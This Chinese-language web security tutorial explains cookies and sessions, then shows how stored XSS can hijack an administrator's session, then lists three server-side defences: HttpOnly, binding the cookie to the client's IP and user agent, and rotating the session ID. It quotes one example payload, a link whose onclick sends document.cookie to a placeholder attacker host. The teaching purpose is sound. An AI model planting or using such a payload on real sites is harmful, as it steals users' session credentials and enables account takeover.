• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >安全教程 > Web 安全之Cookie劫持详细介绍

Web 安全之Cookie劫持详细介绍

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Web 安全之Cookie劫持详细介绍,其中包含web add cookie,web cookie,java web cookie,java web cookie api,cookie劫持等知识点,遇到此问题的同学们可以参考下
       1. Cookie是什么?
  2. 窃取的原理是什么?
  3. 系统如何防Cookie劫持呢?

  看完这三个回答, 你就明白哪位传奇大侠是如何成功的!!!
  Cookie:
  HTTP天然是无状态的协议, 为了维持和跟踪用户的状态, 引入了Cookie和Session. Cookie包含了浏览器客户端的用户凭证, 相对较小. Session则维护在服务器, 用于维护相对较大的用户信息.
  用通俗的语言, Cookie是钥匙, Session是锁芯.
  Cookie简单理解就是钥匙, 每次去服务端获取资源, 需要带着这把钥匙, 只有自己的锁芯(资源), 才能打开.
  如果你丢掉了钥匙, 那没办法, 只能配一把钥匙和锁芯.
  但是如果钥匙被别人拿了, 那别人就可以冒充你的身份, 去打开你的锁芯, 从而获取你的信息, 甚至挪用你的资金. 这是非常危险的.
  XSS攻击:
  XSS(Cross Site Scripting)是跨站点脚本攻击的缩写. 其就是利用站点开放的文本编辑并发布的功能, 从而造成攻击.
  其实说的简单一点, 就是输入javascript脚本, 窃取并投递cookie信息到自己的站点.
  比如攻击者以一个普通用户登录进来,然后在输入框中提交以下数据:
<a href=# onclick=\”document.location=\’http://attacker-site.com/xss_collect?m=\’+escape\(document.cookie\)\;\”>快看, 这里有美女在洗澡</a>
攻击者提交了条带<a>标签的数据,该条数据保存于服务器端,而管理员登入时,不小心点击这个链接时,则会把自身的cookie信息, 投递给hacker设定的网址.
http://attacker-site.com/xss_collect/m=xxxxxxyyyyyzzz
  有了该session-id,攻击者在会话有效期内即可获得管理员的权限,并且由于攻击数据已添加入数据库,只要攻击数据未被删除,那么攻击还有可能生效,是持久性的。
  Cookie劫持的防:
  基于XSS攻击, 窃取Cookie信息, 并冒充他人身份.
  服务端如何防呢?
  第一种办法是:
  给Cookie添加HttpOnly属性, 这种属性设置后, 只能在http请求中传递, 在脚本中,document.cookie无法获取到该Cookie值. 对XSS的攻击, 有一定的防御值. 但是对网络拦截, 还是泄露了.
  第二种办法:
  在cookie中添加校验信息, 这个校验信息和当前用户外置环境有些关系,比如ip,user agent等有关.这样当cookie被人劫持了, 并冒用, 但是在服务器端校验的时候, 发现校验值发生了变化, 因此要求重新登录, 这样也是种很好的思路, 去规避cookie劫持.
  第三种办法:
  cookie中session id的定时更换, 让session id按一定频率变换, 同时对用户而言, 该操作是透明的, 这样保证了服务体验的一致性. </div>

您可能想查找下面的文章:

  • Web 安全之Cookie劫持详细介绍

相关文章

  • 编辑器代码逃逸漏洞 by蚊虫原创
  • 通过ssh反向连接内网主机的方法(防火墙的主机)
  • 详解黑客修改WordPress核心文件,劫持网站流量
  • 总结各大高手的提权思路
  • 命令行下一种新的加帐号的方法
  • 黑客攻击数据库的六大手段
  • swf 调用网马代码
  • FSO的开启方法
  • 新型DDos攻击:利用LDAP服务器可实现攻击放大46-55倍
  • DNS欺骗的原理 DNS防御实战演练

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • 服务器如何有效防止DDoS攻击?
    • DiskFiltration电脑没联网,黑客也能靠硬盘窃取电脑数据文件
    • 详解黑客最喜欢使用的三种关机方式 黑客的关机图文视频教程
    • IPSEC野蛮模式的详细介绍(图文教程)
    • 网页挂马详细步骤教程
    • 快速确定特定端口的使用程序
    • FSO的开启方法
    • 木马连接原理
    • mysql 读取文件的几种方式及应用
    • 什么样的密码难破解最安全?表情符号成最安全的密码

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有